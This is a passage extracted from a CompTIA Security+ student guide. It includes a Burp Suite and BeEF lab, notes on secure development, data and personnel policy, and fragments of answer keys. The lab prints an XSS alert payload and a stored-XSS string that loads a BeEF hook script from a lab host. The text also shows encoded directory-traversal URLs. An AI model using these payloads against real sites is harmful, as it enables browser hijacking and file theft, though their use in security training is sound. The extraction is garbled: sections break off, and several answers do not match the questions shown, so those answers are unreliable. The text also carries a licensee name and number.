g) In Burp Suite, note the content of what the browser is sending to the server—a simple
page request along with some information about itself. Select the Forward button.
h) Note that the browser has made another request (for a JPEG icon). Select the
Forward button to let this through too.
i) In the browser, type a message into the box, then select the Save Blog Entry button.
Note that, again, nothing happens.
j) In Burp Suite, analyze the contents of the request. This is a POST request (compared
to the previous GET) and contains the text you typed and the control used. Note that
the application has also set a session cookie. Select the Forward button.
k) Select the Intercept is On button to switch it off.
4. If you want to probe this site for injection vulnerabilities, a basic test is to try to
use some JavaScript to show an alert.
a) In Burp Suite, select the HTTP history tab. Locate the POST record then right-click it
and select Send to Repeater.
b) Select the Repeater tab. In the Request panel, select the Params tab.
c) In the blog_entry box, add the following code to whatever you typed then press
Enter:
<script>alert ("Gotcha")</script>
Testing a form for XSS vulnerability. (Screenshot used with permission from Portswigger.)
d) Right-click the blog_entry line and select Request in browser→In original session.
Select the Copy button.
e) Switch to the browser and paste the copied URL into the address bar. Press Enter.
f) Confirm the alert.
5. Next, you will use the XSS vulnerability in conjunction with the Browser
Exploitation Framework (BeEF) (http://beefproject.com).
a) In the browser, to suppress the alert when viewing the page, select the Reset DB
option in the web application's toolbar to clear the blog entries. Select OK to confirm.
b) In the blog entry box, enter the following string:
I thought we could use this site to exchange ideas on
security controls?<script src="http://10.1.0.192:3000/
hook.js"></script>
Observing the exploit script's connection over port 3000. (Screenshot used with permission
from Microsoft.)
d) In the browser, open the URL updates.corp.515support.com
e) Switch to KALI and view the BeEF application again. In a few moments, you will see
the Windows browser listed as offline.
An attacker needs some means of making the attack persistent—perhaps using a
clickjacking attack on one of the vulnerable blogging app's form controls. That's a task
for a more advanced security course, however.
Topic B
Summarize Secure Application
Development Concepts
EXAM OBJECTIVES COVERED
1.6 Explain the impact associated with types of vulnerabilities.
3.4 Explain the importance of secure staging deployment concepts.
3.6 Summarize secure application development and deployment concepts.
As a member of an information security team, you may not program software directly,
but you'll likely still be invested in the software development process. After all, any app
developed by the organization or by a third party specifically for the organization is
part of the organization's assets, and therefore it is subject to security processes. You
may also be developing or deploying programs and scripts to assist with automated
processes (DevOps).
Agile development flips the waterfall model by iterating through phases concurrently
on smaller modules of code or sub-projects. The phases of the Agile model are:
• Concept—devise the initial scope and vision for the project and determine its
feasibility.
• Inception—identify stakeholders and support for the project and start to provision
resources and determine requirements.
• Iteration—prioritize requirements and work through cycles of designing,
developing, testing, and test deploying solutions to the project goals, adapting to
changing requirements, priorities, and resources as needed.
• Transition—perform final integration and testing of the solution and prepare for
deployment in the user environment.
• Production—ensure that the solution operates effectively.
• Retirement—deprovision the solution and any environmental dependencies.
This piecemeal approach can react to change better, but has the disadvantage of
lacking overall focus and can become somewhat open-ended.
Note: The waterfall model is often described as a marathon, while the Agile model is a
series of sprints.
INPUT VALIDATION
As discussed earlier, the primary vector for attacking applications is to exploit faulty
input validation. Input could include user data entered into a form or URL passed by
another application or link. Malicious input could be crafted to perform an overflow
attack or some type of injection attack. To mitigate this risk, all input methods should
be documented with a view to reducing the potential attack surface exposed by the
application. There must be routines to check user input, and anything that does not
conform to what is required must be rejected.
set. This ensures that the string is in a format that can be processed correctly by the
input validation routines.
An attacker might use a canonicalization attack to disguise the nature of the
malicious input. Canonicalization refers to the way the server converts between the
different methods by which a resource such as a file path or URL may be represented
and submitted to the simplest (or canonical) method used by the server to process the
input. Examples of encoding schemes include HTML entities and character set
encoding (ASCII and Unicode). An attacker might be able to exploit vulnerabilities in
this process to perform code injection or facilitate directory traversal. For example, to
perform a directory traversal attack, the attacker might submit a URL such as:
http://victim.com/show=../../../../etc/config
A limited input validation routine would prevent the use of the string ../ and refuse the
request. If the attacker submitted the URL using the encoded version of the characters,
he or she might be able to circumvent the validation routine:
http://victim.com/show=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/
config
FUZZING
Fuzzing is a means of testing that an application's input validation routines work well.
Fuzzing means that the test or vulnerability scanner generates large amounts of
deliberately invalid and/or random input and records the responses made by the
application. This is a form of "stress testing" that can reveal how robust the application
is.
XSS/XSRF PREVENTION
Input validation should be enough to defeat most cross-site style attacks. The other
consideration is for the application to use secure authentication and authorization
procedures. Naïve methods of recording sessions, such as unencrypted cookies,
should be deprecated. Even if a user has authenticated, any actions the user attempts
to perform should be properly authorized using some sort of secure token that an
attacker cannot spoof or replay.
do. Each procedure can have multiple error handlers. Some handlers will deal with
anticipated errors and exceptions; there should also be a catch-all handler that will
deal with the unexpected.
The main goal must be for the application not to fail in a way that allows the attacker to
execute code or perform some sort of injection attack. Another issue is that an
application's interpreter will default to a standard handler and display default error
messages when something goes wrong. These may reveal the inner workings of code
to an attacker. It is better for an application to use custom error handlers so that the
developer can choose the amount of information shown when an error is caused.
Many arbitrary code attacks depend on the target application having faulty memory
management procedures. This allows the attacker to execute his or her own code in
the space marked out by the target application. There are known unsecure practices
for memory management that should be avoided and checks for processing untrusted
input, such as strings, to ensure that it cannot overwrite areas of memory.
STORED PROCEDURES
A stored procedure is a part of a database that executes a custom query. The
procedure is supplied an input by the calling program and returns a pre-defined
output for matched records. This can provide a more secure means of querying the
database. Any stored procedures that are part of the database but not required by the
application should be disabled.
CODE SIGNING
Code signing is the principal means of proving the authenticity and integrity of code
(an executable or a script). The developer creates a cryptographic hash of the file then
signs the hash using his or her private key. The program is shipped with a copy of the
developer's code signing certificate, which contains a public key that the destination
computer uses to read and verify the signature. The OS then prompts the user to
choose whether to accept the signature and run the program.
OBFUSCATION/CAMOUFLAGE
In development, it is important that code be well documented, to assist the efforts of
multiple programmers working on the same project. Well-documented code is also
easier to analyze. Code can be made difficult to analyze by using an obfuscator, which
is software that randomizes the names of variables, constants, functions, and
procedures, removes comments and white space, and performs other operations to
make the compiled code physically and mentally difficult to read and follow. This sort
of technique might be used to make reverse engineering an application more difficult
and as a way of disguising malware code.
Another option is to encrypt the code, but if the code is to run, the encryption key must
be made available on the host at some point. This gives a malicious process on the
same host the chance of recovering the key from memory.
APPLICATION AUDITING
A new application should be audited to ensure that it meets the goals of
confidentiality, integrity, and availability critical to any secure computer system. Test
any new or updated applications thoroughly before deploying them to a production
server. Use pen test methods to try to discover and exploit any weaknesses in the
application's design or implementation. Application vulnerability scanners automate
the process of testing for known vulnerabilities and unsecure coding practice,
monitoring typical user behavior (beta testers) to find out if the application could be
used in ways the developers might not have expected. As well as testing the
application in production, submit new applications for architecture, design, and code
reviews. These should take place when the application is first commissioned and when
it is upgraded or at regular intervals thereafter to ensure that the application is not
vulnerable to new threats.
• A design review will ensure that security is a requirement for the application. One
of the design goals of a secure application should be to reduce the attack surface.
The attack surface is all the ways that a user (including malicious users) can
interact with the application. This includes ways that the application designer has
foreseen, such as form fields and Application Programming Interfaces (API)—
methods other applications can call—and those that they have not. As well as
simplifying the application, it is also important to reduce the attack surface of the
host OS and network. These should be set at the minimum configuration required
to run the application.
Fuzzing is a technique designed to test software for bugs and vulnerabilities. There are
generally three types of fuzzers, representing different ways of injecting manipulated
input into the application:
• Application UI—identify input streams accepted by the application, such as input
boxes, command line switches, or import/export functions.
• Protocol—transmit manipulated packets to the application, perhaps using
unexpected values in the headers or payload.
• File format—attempt to open files whose format has been manipulated, perhaps
manipulating specific features of the file.
Fuzzers are also distinguished by the way in which they craft each input (or test case).
The fuzzer may use semi-random input (dumb fuzzer) or might craft specific input
based around known exploit vectors, such as escaped command sequences or
character literals, or by mutating intercepted inputs.
Associated with fuzzing is the concept of stress testing an application to see how an
application performs under extreme performance or usage scenarios.
Finally, the fuzzer needs some means of detecting an application crash and recording
which input sequence generated the crash.
SECURE DevOps
Agile development principles can also be applied to system administration/operations
tasks (Agile operations). Amongst other principles, Agile addresses the idea that
resiliency, the ability to sustain performance despite failures, is a better and more
achievable goal than the elimination of faults. This principle is referred to as fail fast
(and learn quickly). The concept is that faults are much better identified in a production
environment and that this is a more effective way to improve an application, as long as
developers are able to respond quickly. Consequently, there is also growing opinion
that development and operations functions should be more closely tied together. This
model is referred to as software development and operations (DevOps). DevOps
means that there is much more collaboration between developers and system
administrators.
The concepts of Agile operations and DevOps support a few new approaches to
deploying code:
• Immutable infrastructure—This approach first strictly divides data from the
components processing data. Once designed and provisioned as instances, the
components are never changed or patched in place. Deploying a patch or adding a
new application means building a new instance and deploying that.
• Infrastructure as Code—This is the principle that when deploying an application, the
server instance supporting the application can be defined and provisioned through
the software code. Imagine a setup program that not only installs the application
but also creates a VM and OS on which to run the application.
• Security automation—The concept of scripted or programmed infrastructure can
also be applied to security infrastructure (firewalls, IDS, SIEM, and privilege
management). For example, security automation might mean that a user account
is provisioned by running a script for the appropriate role rather than relying on a
human administrator to select the appropriate security groups and policy settings.
Note: To learn more, watch the related Video on the course website.
Activity 15-3
Discussing Secure Application
Development Concepts
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic.
A default error message might reveal the workings of the code to an attacker.
A Software Development Kit (SDK) contains tools and code examples released
by a vendor to make developing applications within a particular environment
(framework, programming language, OS, and so on) easier. Any element in the
SDK could contain vulnerabilities that could then be transferred to the
developer's code or application.
Summary
In this lesson, you learned about software and coding risks and vulnerabilities and
about secure application development and deployment tools and practices.
• You should be able to describe the risks posed by application or coding
vulnerabilities and their potential exploits.
• You should understand the use of development and deployment lifecycle models
and the processes involved in defining and meeting security requirements.
• You should be able to select appropriate methods and tools to perform software
and code auditing and testing.
A: Answers will vary, but may include clickjacking, DLL injections attacks, Cross-Site
Scripting, session hijacking, and Man-in-the-Browser attacks.
A: Answers will vary, but the main goal of DevOps is to integrate software
development with systems operations so that both disciplines benefit from
quicker and more reliable deployments in the organization. Organizations
looking to streamline their security operations may be able to take advantage of
DevOps to automate processes that otherwise take a lot of time and resources
to run manually.
Practice Questions: Additional practice questions are available on the course website.
LESSON INTRODUCTION
Now that you have implemented and managed your basic security infrastructure, you will need to
make sure that your personnel follow appropriate security procedures and policies, as well as rules
and regulations set forth by external agencies. In this lesson, you'll explain the importance of
security policies in your organization's day-to-day business operations.
LESSON OBJECTIVES
In this lesson, you will:
• Explain the importance of security policies.
• Implement data security and privacy practices.
• Explain the importance of personnel management.
Topic A
Explain the Importance of Security
Policies
EXAM OBJECTIVES COVERED
5.1 Explain the importance of policies, plans, and procedures related to organizational
security.
Security policies and procedures both set the tone for employee attitudes towards
security and set standards for completing their work with proper regard for
information security. These policies and procedures may also need to be expressed in
agreements with external partners, suppliers, and customers. As a security
professional, you will need to select and apply these policies, procedures, and
agreements wisely.
INTEROPERABILITY AGREEMENTS
It is important to remember that although one can outsource virtually any service or
activity to a third party, one cannot outsource legal accountability for these services or
actions. You are ultimately responsible for the services and actions that these third
parties take. If they have any access to your data or systems, any security breach in
their organization (for example, unauthorized data sharing) is effectively a breach in
yours. Issues of security risk awareness, shared duties, and contractual responsibilities
can be set out in a formal legal agreement. The following types of agreements are
common:
• Memorandum of understanding (MOU)—A preliminary or exploratory agreement
to express an intent to work together. MOUs are usually intended to be relatively
informal and not to act as binding contracts. MOUs almost always have clauses
stating that the parties shall respect confidentiality, however.
• Memorandum of agreement (MOA)—A formal agreement (or contract) that
contains specific obligations rather than a broad understanding. If one party fails to
fulfill its obligations, the other party will be able to seek redress under the terms of
the agreement through the courts.
Note: Contract law is complex. It is possible for a document described as an "MOU"
in a heading to create legally enforceable terms if the wording of the document
establishes some sort of obligation to act, especially if it is in return for payment. The
name of the agreement is not relevant—the terms are.
• Service level agreement (SLA)—A contractual agreement setting out the detailed
terms under which a service is provided.
• Business partners agreement (BPA)—While there are many ways of establishing
business partnerships, the most common model in IT is the partner agreements
that large IT companies (such as Microsoft and Cisco) set up with resellers and
solution providers.
• Interconnection security agreement (ISA)—ISAs are defined by NIST's SP800-47
"Security Guide for Interconnecting Information Technology Systems" (https://
csrc.nist.gov/publications/detail/sp/800-47/final). Any federal agency
interconnecting its IT system to a third party must create an ISA to govern the
relationship. An ISA sets out a security risk awareness process and commits the
agency and supplier to implementing security controls.
• Non-disclosure agreement (NDA)—Legal basis for protecting information assets.
NDAs are used between companies and employees, between companies and
contractors, and between two companies. If the employee or contractor breaks this
agreement and does share such information, they may face legal consequences.
NDAs are useful because they deter employees and contractors from violating the
trust that an employee places in them.
A legal agreement is all very well, but it is still up to you to make sure that your
suppliers, vendors, and contractors can live up to it. If they can't, you may successfully
sue them, but if they go out of business, you are still accountable for their actions or
failures to act.
Note: Conversely, you need to ensure that you can comply with the requirements and
performance standards of any agreements that you enter into as a service provider.
Activity 16-1
Discussing the Importance of Security
Policies
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic.
1. What is an SOP?
Topic B
Implement Data Security and Privacy
Practices
EXAM OBJECTIVES COVERED
2.2 Given a scenario, use appropriate software tools to assess the security posture of an
organization.
5.8 Given a scenario, carry out data security and privacy policies.
In any organization, data is not just a static asset to be casually checked on every so
often. On the contrary, the sensitivity and mutability of data means that you need to
closely manage that data. Implementing data management processes in your security
operations is crucial. Data security refers to the security controls and measures taken
to keep an organization's data safe and accessible, and to prevent unauthorized access
to it. Today's workforce is more mobile than ever before, and the need for enhanced
data security is on the rise. Greater volumes of data are now stored and accessed in
many locations, so organizations must consider not only the physical access to data
storage systems, but also the devices that access them. Data security must be a
priority for every organization, and it should be incorporated into all security policies.
DATA ROLES
Data handling or document management is the process of managing information
over its lifecycle (from creation to destruction). At each stage of the lifecycle, security
considerations are vital. A data policy describes the security controls that will be
applied to protect data at each stage of its lifecycle. Data policies and procedures are
important in reducing the risk of data loss or theft. There may also be legal and
compliance reasons for enforcing strict data policies. The regulations for the health
care and payment card industries contain many specific terms for preventing data
breach. A company that does not comply with the regulations could face hefty fines
and be prevented from accessing the market. Employees that are negligent in
performing their roles could even face criminal proceedings.
Note: Information management is a massive task in any organization. Most schemes
focus on structured data (that is, information that is stored in a directory hierarchy and
subject to administrative access controls). Managing and classifying unstructured data
(emails, chat sessions, telephone calls, and so on) is an even more daunting task, though
software solutions designed to tackle this problem are emerging.
The information management workflow for each document will involve several roles
with different functions, such as authors, editors, reviewers, and publishers. There are
also important data roles for oversight and management of a range of information
assets within the organization. A company with a formal data governance policy will
define the following roles:
• Data owner—A senior (executive) role with ultimate responsibility for maintaining
the confidentiality, integrity, and availability of the information asset. The owner is
responsible for labeling the asset (such as determining who should have access and
determining the asset's criticality and sensitivity) and ensuring that it is protected
with appropriate controls (access control, backup, retention, and so forth). The
owner also typically selects a steward and custodian and directs their actions.
• Data steward—This role is primarily responsible for data quality. This involves
tasks such as ensuring data is labelled and identified with appropriate metadata
and that data is collected and stored in a format and with values that comply with
applicable laws and regulations.
• Data custodian—This role is responsible for managing the system on which the
data assets are stored. This includes responsibility for enforcing access control,
encryption, and backup/recovery measures.
Note: One of the problems with access control systems is that they are very difficult
to make data inaccessible to system administrators. Privileged admin accounts can
generally take ownership or change the permissions of any type of resource. Non-
discretionary privilege management models are aimed to mitigate this, but even then
it is difficult to secure data from the people responsible for managing the model.
Strict audit policies are also of use, but again there is the potential for an account
with complete privileges to compromise the audit system.
• Privacy officer—This role is responsible for oversight of any personally identifiable
information (PII) assets managed by the company. The privacy officer ensures that
the processing and disclosure of PII complies with legal and regulatory frameworks.
The privacy officer will also oversee retention of PII. One principal of personal data
privacy is that information be retained for only as long as is necessary. This can
complicate the inclusion of PII in backups and archives.
Information may change in sensitivity, typically becoming less sensitive over time. A
document may be downgraded to a lower security level or eventually declassified. In
this circumstance, there needs to be a clear process of authorization and notification,
so that confidentiality is not breached.
Information classification lends itself to the mandatory access control (MAC) model.
However, even where a document is subject to DAC or RBAC, it is still wise to label the
document with its sensitivity level, especially when it is transmitted in a form that is not
subject to the access control system (such as printed copies).
Using Microsoft Azure Information Protection to define an automatic document labeling and
watermarking policy. (Screenshot used with permission from Microsoft.)
customer database, or revealing an email address to others through the careless use
of Reply All or Send To address fields.
DATA RETENTION
Data retention is the process of an organization maintaining the existence of and
control over certain data in order to comply with business policies and/or applicable
laws and regulations. In many cases, the organization is required by law to retain
certain types of data for different lengths of time. For example, an American health
care provider will need to retain audit logs for several years as mandated by HIPAA. On
the other hand, the provider may also be required to retain employee correspondence
over email for a shorter duration. Organizations must often balance their retention
needs with the privacy stipulations. PII, PHI, and other personal information needs to
be retained for some duration; however, keeping these records for too long will place
them at greater risk of being compromised. Data retention policies must therefore
integrate closely with data disposal policies for optimal security of confidential
information.
A data sanitization and disposal policy refers to the procedures that the
organization has in place for disposing of obsolete information and equipment,
typically storage devices themselves or devices with internal data storage capabilities,
but also paper records.
It's important to shred any sensitive documents prior to disposal. (Photo by monsterkoi on Pixabay.)
MEDIA SANITIZATION
Media sanitization or remnant removal refers to decommissioning various media,
including hard drives, flash drives/SSDs, tape media, CD and DVD ROMs, and so on.
The problem has become particularly prominent as organizations recycle their old PCs,
either by donating them to charities or by sending them to a recycling company, who
may recover and sell the parts. The problem also applies to network printers, which
often have installable hard disks to use to cache print jobs. There are at least three
reasons that make remnant removal critical:
• An organization's own confidential data could be compromised.
• Third-party data that the organization processes could be compromised, leaving it
liable under Data Protection legislation (in addition to any contracts or SLAs signed).
• Software licensing could be compromised.
The main issue is understanding the degree to which data on different media types
may be recoverable. Data deleted from a magnetic-type disk (such as a hard disk) is
not erased. Rather, the sectors are marked as available for writing and the data they
contain will only be removed as new files are added. Similarly, using the standard
Windows® format tool will only remove references to files and mark all sectors as
useable. In the right circumstances and with the proper tools, any deleted information
from a drive could be recoverable.
Data remnants can be dealt with either by destroying the media or by purging it
(removing the confidential information but leaving the media intact for reuse). There
are several different ways of either destroying or purging media:
• Overwriting/disk wiping—Data sanitization software tools ensure that old data is
purged by writing to each location on the media. A simple means of doing this is
zero filling, which sets each bit to zero. Zero filling can leave patterns that can be
read with specialist tools. A more secure method is to overwrite the content with
ones and zeros using pseudorandom input. Overwriting might also be performed in
multiple passes. This is suitable for all but the most confidential data, but is time
consuming and requires special software.
Note: Examples of tools supporting secure file or disk erasing include Sdelete (part of
Sysinternals https://docs.microsoft.com/sysinternals) and Darik's Boot and Nuke
(https://dban.org), plus the Active KillDisk suite shown here.
Active KillDisk data wiping software. (Screenshot used with permission from LSoft Technologies,
Inc.)
• Low-level format—Most disk vendors supply tools to reset a disk to its factory
condition. These are often described as low-level format tools and will have the
same sort of effect as disk wiping software. Technically speaking, a low-level format
creates cylinders and sectors on the disk. This can generally only be done at the
factory. The disk utilities just clean data from each sector; they don't re-create the
sector layout.
• Pulverizing/degaussing—A magnetic disk can be mechanically shredded or
degaussed (exposing the disk to a powerful electromagnet disrupts the magnetic
pattern that stores the data on the disk surface) in specialist machinery. Obviously,
this sort of machinery is costly and will usually render the disk unusable, so it
cannot be repurposed or resold.
A less expensive method is to destroy the disk with a drill or hammer—do be sure
to wear protective goggles. This method is not appropriate for the most highly
confidential data as it will leave fragments that could be analyzed using specialist
tools.
• Disk encryption—This method encrypts all the information in a volume, so that any
remnants could not be read without possession of the decryption key.
Optical media cannot be reformatted. Discs should be destroyed before discarding
them. Shredders are available for destroying CD and DVD media.
Note: To learn more, watch the related Video on the course website.
Activity 16-2
Discussing Data Security and Privacy
Practices
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic.
1. What is the difference between the role of data steward and the role of data
custodian?
The data steward role is concerned with the quality of data (format, labeling,
normalization, and so on). The data custodian role focuses on the system
hosting the data assets and its access control mechanisms.
High, Medium, Low, Confidential, Private, and Public. Often the designations
Top Secret, Secret, Confidential, and Classified are used, too.
Overwriting is secure enough for most purposes. Top secret data may mandate
destruction of the unit. The disk could be disposed of relatively safely if all
confidential information were encrypted, but it would be pointless to leave the
data on the disk for the sake of it.
Topic C
Explain the Importance of Personnel
Management
EXAM OBJECTIVES COVERED
1.6 Explain the impact associated with types of vulnerabilities.
2.3 Given a scenario, troubleshoot common security issues.
5.1 Explain the importance of policies, plans, and procedures related to organizational
security.
vital institutional knowledge is spread among trusted employees. Job rotation also
helps prevent abuse of power, reduces boredom, and enhances individuals'
professional skills.
• Separation of duties is most evident in accounts and financial departments. One
example is requiring all checks to be co-signed (that is, signed by two people);
another is separating responsibility for purchasing (ordering) and payment. M-of-N
control, discussed in the section on cryptography, is another example of separation
of duties.
Note: Separation of duties aims to avoid putting employees in a position where there is a
conflict of interest. An employee is supposed to work for the interests of their
organization exclusively. A situation where someone can act in his or her own interest,
personally, or in the interests of a third party is said to be a conflict of interest.
Note: Separation of duties does not completely eliminate risk because there is still the
chance of collusion between two or more people. This, however, is a much less likely
occurrence than a single rogue employee.
EXIT INTERVIEWS
An exit interview (or offboarding) is the process of ensuring that an employee leaves
a company gracefully. In terms of security, there are several processes that must be
completed:
• IAM—Disable the user account and privileges. Ensure that any information assets
created or managed by the employee but owned by the company are accessible (in
terms of encryption keys or password-protected files).
• Retrieving company assets—Mobile devices, keys, smart cards, USB media, and so
on. The employee will need to confirm (and in some cases prove) that they have not
retained copies of any information assets.
• Returning personal assets—Employee-owned devices need to be wiped of
corporate data and applications. The employee may also be allowed to retain some
information assets (such as personal emails or contact information), depending on
the policies in force.
The departure of some types of employees should trigger additional processes to re-
secure network systems. Examples include employees with detailed knowledge of
security systems and procedures, and access to shared or generic account credentials.
These credentials must be changed immediately.
CONDUCT POLICIES
Other important security policies include those governing employee conduct and
respect for privacy.
Note: Adverse action must also be considered when making hiring decisions. A decision
not to invite a candidate to interview or hire must not be influenced by prejudices.
• Preparing for vendor audits—most license agreements specify that the vendor may
undertake a software license compliance (SLC) audit. This means that the vendor or
their nominated third party may access the customer's systems to audit license
usage.
• Ensuring compliance with the terms of open source licensing. If open source code is
reused (whether in commercial or in-house software), the product must be
distributed in compliance with the terms of the original open source license.
• Overview of the organization's security policies and the penalties for non-
compliance.
• Incident identification and reporting procedures.
• Site security procedures, restrictions, and advice, including safety drills, escorting
guests, use of secure areas, and use of personal devices.
• Data handling, including document confidentiality, PII, backup, encryption, and so
on.
• Password and account management plus security features of PCs and mobile
devices.
• Awareness of social engineering and malware threats, including phishing, website
exploits, and spam plus alerting methods for new threats.
• Secure use of software such as browsers and email clients plus appropriate use of
Internet access, including social networking sites.
It is necessary to frame security training in language that end users will respond to.
Education should focus on responsibilities and threats that are relevant to users. It is
necessary to educate users about new or emerging threats (such as viruses and
Trojans, phishing scams, or zero day exploits in software, such as browser plug-ins),
but this needs to be stated in language that users understand.
For example, if you try to inform users that "The threat of Trojan Horse software being
used to install rootkits that can launch DoS attacks," their response will typically be
either to fall asleep, laugh, or stare at you blankly. Instead, user education should be
phrased in terms that are relevant to what they do day-to-day at work and avoid
technical language and jargon. For example, "Don't try to disable anti-virus software
and don't open email file attachments if you are not sure what they contain."
Similarly, when security alerts are issued, these must be drafted carefully so as not to
cause confusion or alarm. It is important to only issue alerts for critical incidents or
risks. If users are faced with a continual series of alerts, they will start to ignore them.
Continuing education programs ensure that the participants do not treat a single
training course or certificate as a sort of final accomplishment. Skills and knowledge
must be continually updated to cope with changes to technology and regulatory
practices. Continuing education programs often use the concept of credits to show
that a participant has maintained and advanced their understanding of the topic area.
Credits can be earned for work-related activities, participating in seminars or other
industry events, and completing additional courses or certifications.
ROLE-BASED TRAINING
There should also be a system for identifying staff performing security-sensitive roles
and grading the level of training and education required (between beginner,
intermediate, and advanced, for instance). Note that in defining such training
programs you need to focus on job roles, rather than job titles, as employees may
perform different roles and have different security training, education, or awareness
requirements in each role.
Advanced security training will be required for roles such as IT and networking,
management, software development, and accounts. Some of the specific training
requirements of security-focused job roles are as follows:
• System owner—This role is responsible for designing and planning computer,
network, and database systems. The role requires expert knowledge of IT security
and network design.
• Data owner—As described earlier, data owner is a role with overall responsibility for
data guardianship (possibly in conjunction with data stewards). Training for this role
will focus on compliance issues and data classification systems.
• System administrator/data custodian—The day-to-day sysadmin role requires
technical understanding of access controls and privilege management systems.
LICENSED FOR USE ONLY BY: RAMIL · 7543944 · FEB 29 2020
Lesson 16: Explaining Organizational Security Concepts | Topic C
674 | The Official CompTIA® Security+® Student Guide (Exam SY0-501): 2019 Update
Note: To learn more, watch the related Video on the course website.
Activity 16-3
Discussing the Importance of Personnel
Management
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic.
Any task that should not be actioned by a single person. Typically, this is to
prevent fraud or embezzlement.
2. What type of organizational policy ensures that at least two people have
oversight of a critical business process?
Insider threats.
A breach in licensing terms may lead to the organization suddenly being denied
use of the software (availability) while integrity is threatened by fines and loss of
reputation. Unauthorized software is also a risk to integrity as it could be a
vector for malware.
5. Your company has been the victim of several successful phishing attempts
over the past year. Attackers managed to steal credentials from these
attacks and used them to compromise key systems. What vulnerability
contributed to the success of these social engineers, and why?
Answers may vary. While it's possible that lax password requirements and
incorrect privileges may have contributed to the account compromise, the most
glaring problem is that the terminated employee's account wasn't disabled.
Since the account was no longer being used, it should not have been left active
for a malicious user to exploit.
Uses of technology and security threats and risks are always changing and
employees' knowledge and skills must keep pace with these changes. Training
requirements may also be driven by regulatory changes to procedures and best
practices.
Activity 16-4
Incorporating Documentation in
Operational Security
SCENARIO
Your organization has had several issues with personnel behavior that has put the
organization at risk. For example:
• Employees are sending sensitive company files and passwords over email to
external addresses, which has led to data leakage on more than one occasion.
• Employees are using weak passwords that have been easily cracked in a
penetration test.
• Employees are leaving sensitive paper documents and USB drives containing
company secrets on their desks when they leave for the day, which has led to the
theft of these assets.
• Employees are using their workstations to play games, download copyrighted
material, and download malicious software—all unacceptable behavior that brings
about drops in productivity, legal issues, and potential harm to the network.
In a new initiative to curb this behavior, management recognizes the need for official
policies that clearly state how employees should and should not use company
property at work. Rather than draft these policies from scratch, you'll consult some
free policy templates provided by the SANS Institute.
2. Which of the following policies do you think are the most relevant to
management's security concerns as noted in the scenario?
Answers may vary, but the most relevant policies are likely to be Acceptable Use
Policy, Clean Desk Policy, Email Policy, Password Construction Guidelines, and
Password Protection Policy.
Answers may vary, but most policy templates have an Overview section; a
Purpose section; a Scope section; a Policy section; a Policy Compliance section;
a Related Standards, Policies and Processes section; a Definitions and Terms
section; and a Revision History section.
Answers will vary based on the policy chosen, but most will likely concern
general acceptable use or acceptable use of specific technologies and services.
6. Review the actual policy statements. Are there any items you would
consider adding to the policy, or any you would remove? Why?
Answers will vary. In general, students may see certain items as being too
restrictive, or they may note the lack of a certain item they feel is important.
7. Several of the policies in the General category prescribe behavior for all
users, regardless of role. Other than handing users the policy document and
requiring them to sign in, how else might you ensure that they understand
the importance of the security practices contained in these policies?
Summary
In this lesson, you learned about the use of policies and procedures to enforce
organizational security.
• You should understand the importance of security policies and procedures and
identify the types of agreement used to enforce them.
• You should understand the roles and procedures involved in data handling and
data destruction/media sanitization.
• You should know the range of policies and training methods typically used to
enforce organizational security.
What compliance requirements does your organization have? How have they
affected your security operations?
What types of conduct policies are you experienced with? How effective do you
feel they were in protecting data assets from security hazards?
A: Answers will vary. From AUPs to BYOD rules to a clean desk policy, each
organization implements differing sets of policies to protect themselves and
their data. The actual effectiveness of some policies might be less of a deterrent
than an avenue for prosecution or restitution when a breach does occur.
Practice Questions: Additional practice questions are available on the course website.
Course Follow-Up
Congratulations! You have completed The Official CompTIA® Security+® (Exam SY0-501):
2019 Update course. You have gained the foundational skills and information you will
need to implement and monitor security on hosts, networks, applications, and
operating systems; and respond to attacks, security breaches, and business disasters.
You also covered the objectives that you need to prepare for the CompTIA Security+
(Exam SY0-501) certification examination. If you combine this class experience with
review, private study, and hands-on experience, you will be well prepared to
demonstrate your security expertise both through professional certification and with
solid technical competence on the job.
What's Next?
Become a CompTIA Security+ Certified Professional!
CompTIA Security+ is a global certification that validates the baseline skills you need to
perform core security functions and pursue an IT security career. Cybersecurity
professionals with Security+ know how to address security incidents—not just identify
them. Security+ is compliant with ISO 17024 standards and approved by the US DoD to
meet directive 8140/8570.01-M requirements.
In order to become a CompTIA Security+ Certified Professional, you must successfully
pass the Security+ exam (Exam Code SY0-501).
In order to help you prepare for the exam, you may want to invest in CompTIA's exam
prep product, CertMaster Practice for Security+.
CertMaster Practice is an online knowledge assessment and certification training
companion tool specifically designed for those who have completed The Official
CompTIA Security+ course. It helps reinforce and test what you know and close
knowledge gaps prior to taking the exam.
CertMaster Practice features:
• Adaptive knowledge assessments with feedback, covering all domains of the
Security+ exam.
• Practice tests with performance-based questions.
• Question-first design and smart refreshers to get feedback on the questions you get
wrong.
• Learning analytics that track real-time knowledge gain and topic difficulty to help
you learn intelligently.
For more information about how to register for and take your exam, please visit the
CompTIA website: https://certification.comptia.org/testing.
3. What term is used to describe a property of a secure network where a sender cannot
deny having sent a message?
Non-repudiation.
4. In the context of information security, what factors determine the value of an asset?
An asset may have a simple market value, which is the cost of replacement. The loss of an asset may
expose a company to business continuity and legal liabilities, however, which may greatly outweigh the
market value.
5. What is an ISSO?
Information Systems Security Officer—an employee with responsibility for implementing, maintaining, and
monitoring security policy.
1. Which of the following would be assessed by likelihood and impact: vulnerability, threat,
or risk?
Risk
2. True or false? Nation state actors primarily only pose a risk to other states.
False—nation state actors have targeted commercial interests for theft, espionage, and blackmail.
3. Which of the following threat actors is primarily motivated by the desire for social
change?
Insiders
Hacktivists
Competitors
Organized crime
☐ Hacktivists
☐ Nation states
☑ Organized crime
☑ Competitors
5. What is the difference between a hacker and a script kiddie?
A hacker has the skills and experience to devise new types of attack and attack tools.
A script kiddie lacks this skill and experience and is limited to using well-known and
documented attack methods and tools.
6. In which stage of the "kill chain" does a threat actor first gain access
to a resource on the target network?
Weaponization
8. Just about every employee at the IT services company 515 Support has
some sort of social networking presence, whether personal or
professional. How might an attacker use open source intelligence
available on sites like Facebook, Twitter, and LinkedIn, to aid in their
attacks?
Answers will vary, but people often share a great deal of information on social
networking sites. If these profiles are public, the attacker can glean important details
